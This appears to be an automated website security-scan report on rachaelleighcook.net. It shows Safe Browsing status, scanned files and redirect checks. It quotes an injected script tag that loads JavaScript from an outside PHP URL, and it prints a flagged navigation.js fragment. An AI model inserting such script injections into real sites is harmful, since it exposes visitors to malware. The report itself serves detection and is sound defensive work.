Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rachaelleighcook.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rachaelleighcook.net/ | 200 OK Content-Length: 15690 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://www.happyou.it/cli/ZSpl3Mb7.php?id=17347834" type="text/javascript"></script> | ||
http://rachaelleighcook.net/source/js/navigation.js | 200 OK Content-Length: 7968 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function newImage(arg) { if (document.images) { rslt = new Image(); rslt.src = arg; return rslt; } } function changeImages() { if (document.images && (preloadFlag == true)) { for (var i=0; i < changeImages.arguments.length; i =2) { document[changeImages.arguments[i]].src = changeImages.arguments[i 1]; } } } var preloadFlag = false; function preloadImages() { if (document.images) { nav_bio_over Antivirus reports:
| ||
http://twitter.com/javascripts/blogger.js | HTTP/1.1 301 Moved Permanently Date: Mon, 12 Jan 2015 05:44:26 UTC Location: https://twitter.com/javascripts/blogger.js Server: tsa_b Content-Length: 0 Set-Cookie: guest_id=v1%3A142104146676417496; Domain=.twitter.com; Path=/; Expires=Wed, 11-Jan-2017 05:44:26 UTC X-Connection-Hash: 457025af9b5ad98d792c1908f590cb83 X-Response-Time: 2 | clean |
https://twitter.com/javascripts/blogger.js | 404 Not Found Content-Length: 4311 Content-Type: text/html | clean |
https://abs.twimg.com/errors/404-4f54405af9c0bcdecbe656ca8893f7a9.js | 200 OK Content-Length: 10803 Content-Type: application/javascript | clean |
https://twitter.com/ | 200 OK Content-Length: 58675 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/en/init.f03f55f96e27fd122dd08346c1e730a3b4d879e6.js | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
https://twitter.com/?lang=id | 200 OK Content-Length: 59169 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/id/init.b9eba085ac3062727e74518f493ac308e94d40e3.js | 200 OK Content-Length: 300096 Content-Type: application/javascript | clean |
https://twitter.com/?lang=msa | 200 OK Content-Length: 59336 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/msa/init.637deb8fa3f9ff7facae7c324ee2a8479ff5d87d.js | 200 OK Content-Length: 300096 Content-Type: application/javascript | clean |
https://twitter.com/?lang=cs | 200 OK Content-Length: 59582 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/cs/init.755fe71ed55d6bcc28763e0f98239cb1411761eb.js | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
https://twitter.com/?lang=da | 200 OK Content-Length: 58982 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/da/init.beaf89a29480d2e9f5902c9415c04c1c88778915.js | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
https://twitter.com/?lang=de | 200 OK Content-Length: 59693 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rachaelleighcook.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 05:33:58 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 15690
Content-Type: text/html
...15690 bytes of data.
GET / HTTP/1.1
Host: rachaelleighcook.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 05:33:58 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 15690
Content-Type: text/html
...15690 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rachaelleighcook.net
Referer: http://www.google.com/search?q=rachaelleighcook.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rachaelleighcook.net
Referer: http://www.google.com/search?q=rachaelleighcook.net
Result:
The result is similar to the first query. There are no suspicious redirects found.